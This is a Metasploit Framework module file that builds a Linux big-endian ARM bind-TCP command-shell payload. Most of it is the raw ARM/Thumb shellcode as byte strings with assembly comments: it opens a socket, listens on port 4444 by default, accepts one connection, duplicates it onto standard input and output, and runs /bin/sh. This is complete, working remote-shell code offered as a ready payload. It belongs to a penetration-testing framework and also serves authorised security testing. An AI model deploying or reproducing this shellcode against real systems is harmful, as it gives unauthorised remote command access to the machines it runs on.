GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
  # Length in bytes of the payload built with the default options: 110 bytes
  # of ARM/Thumb code emitted by #generate plus the default CMD "/bin/sh" and
  # its NUL terminator (8 bytes). Must be kept in sync with the byte sequence
  # in #generate and the default CMD.
  CachedSize = 118

  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions

  # Describes the payload to the framework: a single-stage, inline command
  # shell for big-endian ARM Linux that listens on a TCP port (Bind TCP
  # handler) and yields a Unix command-shell session once a client connects.
  #
  # @param info [Hash] module metadata supplied by the framework, merged
  #   with the defaults below
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Linux ARM Big Endian Command Shell, Bind TCP Inline',
        'Description' => 'Listen for a connection and spawn a command shell',
        'Author' => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
        'References' => [['URL', 'https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s']],
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Arch' => ARCH_ARMBE,
        'Handler' => Msf::Handler::BindTcp,
        'Session' => Msf::Sessions::CommandShellUnix
      )
    )
    # Register command execution options:
    #  - CMD:   the program passed to execve() once the connection is set up
    #  - LPORT: the TCP port the payload binds to (default 4444)
    register_options(
      [
        OptString.new('CMD', [ true, 'The command to execute.', '/bin/sh' ]),
        Opt::LPORT(4444)
      ]
    )
  end

  # Builds the raw payload bytes.
  #
  # The code is a fixed byte sequence with two patch points: the high and low
  # bytes of LPORT, which become the immediates of two `add r2` instructions
  # that assemble the sockaddr_in family/port word, and CMD, which is
  # NUL-terminated and appended after the exit() block. The `mov r0, pc` /
  # `add r0, #18` pair in the execve() block is expected to land on that
  # appended string, so the number of bytes between those instructions and
  # the end of the exit() block must not change.
  #
  # From a defender's view the resulting process creates a listening TCP
  # socket, accepts one connection, duplicates it onto fds 0-2 via dup2()
  # and then execve()s CMD -- a plain bind-shell pattern.
  #
  # @param _opts [Hash] unused; present for interface compatibility
  # @return [String] the payload bytes
  def generate(_opts = {})
    # CMD is always NUL-terminated so execve() sees a proper C string.
    cmd = (datastore['CMD'] || '') + "\x00"
    # LPORT is split into two single-byte strings. Integer#chr raises
    # RangeError for values above 255, so a port above 0xFFFF fails here
    # rather than being silently truncated.
    bytehigh = (datastore['LPORT'].to_i >> 8).chr
    bytelow = (datastore['LPORT'].to_i & 0xFF).chr
    # NOTE(review): Integer#chr yields an ASCII-8BIT string for values >= 0x80,
    # while the "\x.." literals below take the source encoding. Concatenating
    # the two is only safe when the module source is evaluated as binary
    # (presumably what the framework loader does) -- confirm before loading
    # this file as a plain UTF-8 script.

    "\xe2\x8f\x60\x01" + # add r6, pc, #1 #
    "\xe1\x2f\xff\x16" + # bx r6 #

    # thumb mode on
    # socket(2,1,0)
    "\x1a\x92" + # sub r2, r2, r2 #
    "\x1c\x51" + # add r1, r2, #1 #
    "\x1c\x90" + # add r0, r2, #2 #
    "\x02\x0f" + # lsl r7, r1, #8 #
    "\x37\x19" + # add r7, r7, #0x19 #
    "\xdf\x01" + # svc 1 #
    "\x1c\x06" + # mov r6, r0 #

    # bind()
    # r2 is built as 0x0002HHLL: sin_family = AF_INET (2), then the port
    # bytes patched in from LPORT.
    "\x22\x02" + # mov r2, #2 #
    "\x02\x12" + # lsl r2, r2, #8 #
    "\x32" + bytehigh + # add r2, r2, #0xXX (high byte of LPORT) #
    "\x02\x12" + # lsl r2, r2, #8 #
    "\x32" + bytelow + # add r2, r2, #0xXX (low byte of LPORT) #
    "\x1a\xdb" + # sub r3, r3, r3 #
    "\x1b\x24" + # sub r4, r4, r4 #
    "\x1b\x6d" + # sub r5, r5, r5 #
    "\x46\x69" + # mov r1, sp #
    "\xc1\x3c" + # stm r1!, {r2-r5} #
    "\x39\x10" + # sub r1, #0x10 #
    "\x22\x10" + # mov r2, #16 #
    "\x37\x01" + # add r7, r7, #1 #
    "\xdf\x01" + # svc 1 #

    # listen()
    "\x1c\x30" + # mov r0, r6 #
    "\x1a\x49" + # sub r1, r1, r1 #
    "\x37\x02" + # add r7, r7, #2 #
    "\xdf\x01" + # svc 1 #

    # accept()
    "\x1c\x30" + # mov r0, r6 #
    "\x1a\x92" + # sub r2, r2, r2 #
    "\x37\x01" + # add r7, r7, #1 #
    "\xdf\x01" + # svc 1 #
    "\x1c\x06" + # mov r6, r0 #

    # dup2() -- three calls, one each for fds 0, 1 and 2
    "\x1a\x49" + # sub r1, r1, r1 #
    "\x27\x3f" + # mov r7, #63 #
    "\xdf\x01" + # svc 1 #
    "\x1c\x30" + # mov r0, r6 #
    "\x31\x01" + # add r1, r1, #1 #
    "\xdf\x01" + # svc 1 #
    "\x1c\x30" + # mov r0, r6 #
    "\x31\x01" + # add r1, r1, #1 #
    "\xdf\x01" + # svc 1 #

    # execve()
    # r0 is computed pc-relative and is expected to point at the CMD string
    # appended after the exit() block below.
    "\x1a\x92" + # sub r2, r2, r2 #
    "\x46\x78" + # mov r0, pc #
    "\x30\x12" + # add r0, #18 #
    "\x92\x02" + # str r2, [sp, #8] #
    "\x90\x01" + # str r0, [sp, #4] #
    "\xa9\x01" + # add r1, sp, #4 #
    "\x27\x0b" + # mov r7, #11 #
    "\xdf\x01" + # svc 1 #

    # exit()
    "\x1b\x24" + # sub r4, r4, r4 #
    "\x1c\x20" + # mov r0, r4 #
    "\x27\x01" + # mov r7, #1 #
    "\xdf\x01" + # svc 1 #
    # NUL-terminated command string referenced by the execve() block above.
    cmd
  end
end